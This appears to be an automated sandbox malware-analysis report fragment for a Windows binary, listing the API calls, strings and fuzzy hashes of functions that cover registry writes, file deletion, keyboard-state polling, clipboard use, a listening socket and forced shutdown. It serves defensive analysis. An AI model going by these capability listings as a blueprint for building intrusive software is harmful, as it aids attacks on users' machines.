                                                                    • Instruction Fuzzy Hash: FE31D87290121B7AEB24EBB8DC48AEFB7EC9F84260F044196F9D4D3050DB79DA44CB52
                                                                    APIs
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01050953
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0105F910,00000000,?,00000000,?,?), ref: 010509C1
                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01050A09
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01050A92
                                                                    • RegCloseKey.ADVAPI32(?), ref: 01050DB2
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 01050DBF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                    • API String ID: 536824911-966354055
                                                                    • Opcode ID: 353dee929fd7a93ce4c3f048ed76a411baac450fa5391f55b696ef5a73b1d00d
                                                                    • Instruction ID: 1059f88e0a019746a0a74abb7b6b3da3efce9cfcf03c86a07f40669c3c81321c
                                                                    • Opcode Fuzzy Hash: 353dee929fd7a93ce4c3f048ed76a411baac450fa5391f55b696ef5a73b1d00d
                                                                    • Instruction Fuzzy Hash: C70246756046019FDB94EF18C850E2EBBE5EF89710F08885DF9899B362CB74ED01DB81
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0103F113
                                                                    • _wcscmp.LIBCMT ref: 0103F128
                                                                    • _wcscmp.LIBCMT ref: 0103F13F
                                                                      • Part of subcall function 01034385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 010343A0
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0103F16E
                                                                    • FindClose.KERNEL32(00000000), ref: 0103F179
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0103F195
                                                                    • _wcscmp.LIBCMT ref: 0103F1BC
                                                                    • _wcscmp.LIBCMT ref: 0103F1D3
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0103F1E5
                                                                    • SetCurrentDirectoryW.KERNEL32(01088920), ref: 0103F203
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0103F20D
                                                                    • FindClose.KERNEL32(00000000), ref: 0103F21A
                                                                    • FindClose.KERNEL32(00000000), ref: 0103F22C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                    • String ID: *.*
                                                                    • API String ID: 1824444939-438819550
                                                                    • Opcode ID: 730e537bdb521a18b8fd156fe55ebc239c1fc289c2f8f3a5e161a05f11c231e2
                                                                    • Instruction ID: 8525f59a75480d610ec44711d7f4ffa1cf9c83506ddce1de93d7e8dca46e5abf
                                                                    • Opcode Fuzzy Hash: 730e537bdb521a18b8fd156fe55ebc239c1fc289c2f8f3a5e161a05f11c231e2
                                                                    • Instruction Fuzzy Hash: 50311A7690021FBAEB60AE64EC48EEF77AC9F85260F144196E9C0E3090DB35DA45CB55
                                                                    APIs
                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0103A20F
                                                                    • __swprintf.LIBCMT ref: 0103A231
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0103A26E
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0103A293
                                                                    • _memset.LIBCMT ref: 0103A2B2
                                                                    • _wcsncpy.LIBCMT ref: 0103A2EE
                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0103A323
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0103A32E
                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0103A337
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0103A341
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                    • String ID: :$\$\??\%s
                                                                    • API String ID: 2733774712-3457252023
                                                                    • Opcode ID: 59b44c3ecd8cc27e27d94d6a30a3400ef0fb58c70b55d4e50f28165006794f0d
                                                                    • Instruction ID: 46a7ec73e7027997c50401b77b3bc51051643f8f578f746c71b34bbf155d119e
                                                                    • Opcode Fuzzy Hash: 59b44c3ecd8cc27e27d94d6a30a3400ef0fb58c70b55d4e50f28165006794f0d
                                                                    • Instruction Fuzzy Hash: 7331D4B560020AABDB21DFA4DC49FEB37BCEF89740F1041A6F688D6161E77992448B24
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                    • API String ID: 0-4052911093
                                                                    • Opcode ID: eba1c0a0280730b9e632dc3f62ad0107ba65989c2579118c4b54b7a558c64df2
                                                                    • Instruction ID: 845f90edcd985379fc0a4a8b6e2e7040ae9ebd45c39a6175577be34bfd23e2b7
                                                                    • Opcode Fuzzy Hash: eba1c0a0280730b9e632dc3f62ad0107ba65989c2579118c4b54b7a558c64df2
                                                                    • Instruction Fuzzy Hash: D572A271E00269DBDF24DF59C8807AEB7F5FF58350F1481AAE849EB281DB349A41DB90
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 01030097
                                                                    • SetKeyboardState.USER32(?), ref: 01030102
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 01030122
                                                                    • GetKeyState.USER32(000000A0), ref: 01030139
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 01030168
                                                                    • GetKeyState.USER32(000000A1), ref: 01030179
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 010301A5
                                                                    • GetKeyState.USER32(00000011), ref: 010301B3
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 010301DC
                                                                    • GetKeyState.USER32(00000012), ref: 010301EA
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 01030213
                                                                    • GetKeyState.USER32(0000005B), ref: 01030221
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: eea990666be577d71be7b1ef8774c52604323a161d981fdc7cc67a5ebf2be509
                                                                    • Instruction ID: c92e60f04e2c216c7b455325b69919e95fe1add45378d0e6740a42a88b6c7e44
                                                                    • Opcode Fuzzy Hash: eea990666be577d71be7b1ef8774c52604323a161d981fdc7cc67a5ebf2be509
                                                                    • Instruction Fuzzy Hash: 6A51FB3090678929FB75DBA888147EAFFFC9F41280F0845C9EAC2575C7DAA4978CC761
                                                                    APIs
                                                                      • Part of subcall function 01050E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0104FDAD,?,?), ref: 01050E31
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010504AC
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0105054B
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 010505E3
                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01050822
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0105082F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 1240663315-0
                                                                    • Opcode ID: 807404242e04907c579e9be4f6462a05be7010e8979af56ca3ca06301ac9eccf
                                                                    • Instruction ID: b88d6680a905eafa44d479c1d09c7ebad7dc44d55c36d81a5e24fef7801bfed3
                                                                    • Opcode Fuzzy Hash: 807404242e04907c579e9be4f6462a05be7010e8979af56ca3ca06301ac9eccf
                                                                    • Instruction Fuzzy Hash: CAE17E31604205AFCB54DF28C894D2FBBE5FF89714F08856DF88ADB265DA35E805CB91
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                    • String ID:
                                                                    • API String ID: 1737998785-0
                                                                    • Opcode ID: fbcf7a16ea246b36c8988c6723f0a2a74da6e135703864a758e6f0b72af05356
                                                                    • Instruction ID: 1628317bec70a9c4cfdb7c6fd5de9fb6e24260ce8d7c3d165a0c9571b21d1139
                                                                    • Opcode Fuzzy Hash: fbcf7a16ea246b36c8988c6723f0a2a74da6e135703864a758e6f0b72af05356
                                                                    • Instruction Fuzzy Hash: 1521A1B53002129FDB21AF64DC59B6E7BA8FF05750F04806AF9C6DB2A5DB79AC00CB54
                                                                    APIs
                                                                      • Part of subcall function 00FD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD4743,?,?,00FD37AE,?), ref: 00FD4770
                                                                      • Part of subcall function 01034A31: GetFileAttributesW.KERNEL32(?,0103370B), ref: 01034A32
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 010338A3
                                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0103394B
                                                                    • MoveFileW.KERNEL32(?,?), ref: 0103395E
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0103397B
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0103399D
                                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 010339B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                    • String ID: \*.*
                                                                    • API String ID: 4002782344-1173974218
                                                                    • Opcode ID: 8f9f523155c51f134adfb17bdf922ed455a69ab3a373e202efc412cd0dfdd6a3
                                                                    • Instruction ID: 3dc7377317704d7f16ef8e9488b0e671fed85cbe06a6abec18ae287df3529940
                                                                    • Opcode Fuzzy Hash: 8f9f523155c51f134adfb17bdf922ed455a69ab3a373e202efc412cd0dfdd6a3
                                                                    • Instruction Fuzzy Hash: 3551A33180524D9ACF11FBA4DD929EDB7B9AF50300F6400AAE482BB291EF356F0DDB51
                                                                    APIs
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0103F440
                                                                    • Sleep.KERNEL32(0000000A), ref: 0103F470
                                                                    • _wcscmp.LIBCMT ref: 0103F484
                                                                    • _wcscmp.LIBCMT ref: 0103F49F
                                                                    • FindNextFileW.KERNEL32(?,?), ref: 0103F53D
                                                                    • FindClose.KERNEL32(00000000), ref: 0103F553
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                    • String ID: *.*
                                                                    • API String ID: 713712311-438819550
                                                                    • Opcode ID: 1ec7ee45d0783dc501d75ed5a94896300a10bbcb47b865ab05dad456a421198e
                                                                    • Instruction ID: a6232bea56d28b3af1fd7de8294e2fc2c3db37e3ce85a9c45ad4db1511d05b14
                                                                    • Opcode Fuzzy Hash: 1ec7ee45d0783dc501d75ed5a94896300a10bbcb47b865ab05dad456a421198e
                                                                    • Instruction Fuzzy Hash: D3418E71C0020A9FDF50EF68DC48AEEBBB8FF45310F184096E995A7291EB359A84CB51
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: 5dca836acff262f6c1ca57839c3502c99fd97989d692bca8b43b1e61553f5e5b
                                                                    • Instruction ID: 9d0770e0ba47929280e369c4df7fb68b724477687a9198f7fca329f9f12e64cd
                                                                    • Opcode Fuzzy Hash: 5dca836acff262f6c1ca57839c3502c99fd97989d692bca8b43b1e61553f5e5b
                                                                    • Instruction Fuzzy Hash: 3D12CC70A00619DFDF14DFA5C981AEEB7F6FF48304F10452AE886E7255EB3AA910DB50
                                                                    APIs
                                                                      • Part of subcall function 00FD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD4743,?,?,00FD37AE,?), ref: 00FD4770
                                                                      • Part of subcall function 01034A31: GetFileAttributesW.KERNEL32(?,0103370B), ref: 01034A32
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 01033B89
                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 01033BD9
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 01033BEA
                                                                    • FindClose.KERNEL32(00000000), ref: 01033C01
                                                                    • FindClose.KERNEL32(00000000), ref: 01033C0A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                    • String ID: \*.*
                                                                    • API String ID: 2649000838-1173974218
                                                                    • Opcode ID: 481f9cae444ac237a549fb4cb16a3a47260e141fe97982fcf0b0508b7d327edf
                                                                    • Instruction ID: 2fc309fb25bb13b4ab3a130e0e85c949a3edb9073b32325e3788f3cb8e72002b
                                                                    • Opcode Fuzzy Hash: 481f9cae444ac237a549fb4cb16a3a47260e141fe97982fcf0b0508b7d327edf
                                                                    • Instruction Fuzzy Hash: 2C31A0310083859FC305FF28D8918AFB7EDBE91204F484D5EF4D586292EB29DA09DB63
                                                                    APIs
                                                                      • Part of subcall function 010287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0102882B
                                                                      • Part of subcall function 010287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01028858
                                                                      • Part of subcall function 010287E1: GetLastError.KERNEL32 ref: 01028865
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 010351F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                    • String ID: $@$SeShutdownPrivilege
                                                                    • API String ID: 2234035333-194228
                                                                    • Opcode ID: 080c367d44749aa838160397c54c74df83d68937f0718ba99c24ea61ffaa6e9f
                                                                    • Instruction ID: ceb1a7e4ad2e452794c338378acadcd9c8634324362173b35703e2b569709bb1
                                                                    • Opcode Fuzzy Hash: 080c367d44749aa838160397c54c74df83d68937f0718ba99c24ea61ffaa6e9f
                                                                    • Instruction Fuzzy Hash: 44012B357912126BF778726C9C8AFBB76DCEB86240F140865FAC3E60E1D5555C008690
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 010462DC
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 010462EB
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 01046307
                                                                    • listen.WSOCK32(00000000,00000005), ref: 01046316
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 01046330
                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 01046344
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                    • String ID:
                                                                    • API String ID: 1279440585-0
                                                                    • Opcode ID: 9278d5e868049b8bc2ae3d50815d9aa327ddda265ceef498e342b81285ffd1a8
                                                                    • Instruction ID: 878059b502ee5d63887a872fdc0254a5c52731342b62e2712eba5d2e759c0fe3
                                                                    • Opcode Fuzzy Hash: 9278d5e868049b8bc2ae3d50815d9aa327ddda265ceef498e342b81285ffd1a8
                                                                    • Instruction Fuzzy Hash: A721F2706002159FCB10EF68C889A7EB7F9EF45720F148169E896E73C1DB79AD00DB51
                                                                    APIs
                                                                      • Part of subcall function 00FF0DB6: std::exception::exception.LIBCMT ref: 00FF0DEC
                                                                      • Part of subcall function 00FF0DB6: __CxxThrowException@8.LIBCMT ref: 00FF0E01
                                                                    • _memmove.LIBCMT ref: 01020258
                                                                    • _memmove.LIBCMT ref: 0102036D
                                                                    • _memmove.LIBCMT ref: 01020414
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 1300846289-0
                                                                    • Opcode ID: b773df7ffd0365ccff34ae07948a06384808bf547c02ed287110a1045ccf0eb0
                                                                    • Instruction ID: a655db93352f321251eae04be6a83ecefb7a70e73f3e71443595e9fde5a74000
                                                                    • Opcode Fuzzy Hash: b773df7ffd0365ccff34ae07948a06384808bf547c02ed287110a1045ccf0eb0
                                                                    • Instruction Fuzzy Hash: 2302CDB1A00219DBCF04DF68D981ABEBBB5EF44304F1480AAF84ADB355EB35D910DB91
                                                                    APIs
                                                                      • Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623
                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00FD19FA
                                                                    • GetSysColor.USER32(0000000F), ref: 00FD1A4E
                                                                    • SetBkColor.GDI32(?,00000000), ref: 00FD1A61
                                                                      • Part of subcall function 00FD1290: DefDlgProcW.USER32(?,00000020,?), ref: 00FD12D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
